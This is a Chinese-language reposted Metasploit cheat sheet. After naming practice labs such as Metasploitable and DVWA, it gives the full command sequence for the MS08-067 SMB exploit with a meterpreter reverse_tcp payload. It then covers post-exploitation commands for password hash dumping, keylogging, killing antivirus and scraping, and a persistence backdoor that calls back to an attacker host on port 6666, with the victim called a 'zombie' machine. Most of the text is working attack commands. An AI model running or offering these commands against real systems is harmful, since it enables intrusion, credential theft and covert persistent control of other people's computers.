前言:
当前大家对“ubuntu使用metasploit”都比较关注,姐妹们都想要学习一些“ubuntu使用metasploit”的相关资讯。那么小编也在网摘上网罗了一些关于“ubuntu使用metasploit””的相关内容,希望兄弟们能喜欢,小伙伴们一起来了解一下吧!基础知识
Metasploitable:一个刻意制作出来包含漏洞的基于Ubuntu的Linux虚拟机操作系统。
DVWA:一个针对Web应用的Web漏洞实验平台,是一个进行安全脆弱性鉴定的 PHP/MySQL Web 应用。
OWASP WebGoat:主要用于Web漏洞实验。
OWASP iGoat:一款针对苹果手机iOS系统的一个渗透测试平台。
ExploiteMe Mobile Android Labs:一款针对手机Android系统的渗透测试平台。
攻击载荷(Payload): 漏洞利用执行后的代码,或称为目标系统在被渗透攻击 后执行的代码;通常称之shellcode,在目标系统上执行了shellcode之后,才执行命令shell;
渗透攻击(Exploit): 漏洞利用程序。流行的渗透攻击 技术包括缓冲区溢出、Web应用程序 漏洞攻击 ,以及利用配置错误等;
三种启动方式
msfconsole 、 Msfcli 、 armitage
msfconsole 是最灵活、功能最全、应用最广的(其中auxiliary 辅助扫描工具)
armitage图形化界面
加载辅助工具包
把rb文件复制到//usr/share/metasploit-framework/plugins/
例如#:cp db_autopwn.rb /usr/share/metasploit-framework/plugins/
msf5#: load db_autopwn
执行#:db_autopwn -e -t -r -p
------------------------------------------------------------------------------------------------
执行一次漏洞文件的全过程:
步骤1>引入漏洞模块#:use exploit/windows/smb/ms08_067_netapi
步骤2>显示漏洞相关参数#:show options
步骤3>参数赋值 #:set RHOST 192.168.1.100
步骤4>指定payload #: set PAYLoAD windows/meterpreter/reverse_tcp
步骤5>再设置相关参数
步骤6>执行攻击#:exploit
其它:
常用命令:
search 关键词(如portscan)
back 退回上一步:
会话查看#:session -i
------------------------------------------------------------------------------------------------
Meterpreter工具
是metasploit的一个扩展组件,通过#:sessions -i id
常用命令
截屏#:screenshot
系统信息#:sysinfo
获取密码管理员hash值#:hashdump(初验不成功,待验证)
查看进程#:ps
改变进程#:migrate 896(进程pid)
打开远程桌面#:run getgui -e (初验不成功,待验证)
记录键盘#:keyscan_start 之后执行#:keyscan_hump
运行VNC#:run vnc
关闭杀毒软件#:run killav
读取进程文件#:run scraper
帮忙#:help
---------------------********-------控制持久化操作如下---------成功实现过-----------*************----------
#:run persistence -X -i 50 -p 6666 -r 192.168.0.14
解释:run persistence -X -i 多少秒数重连 -p 端口 -r 监控机
---退出meterpreter>
#:use multi/handler
#:set payload windows/meterpreter/reverse_tcp
#:set Lport 6666
#:set lhost 192.168.0.14
#:exploit
注:肉鸡关机后,上述方法就失效了
版权说明:请尊重原创版权,版权归磊氏信息安全所有。
标签: #ubuntu使用metasploit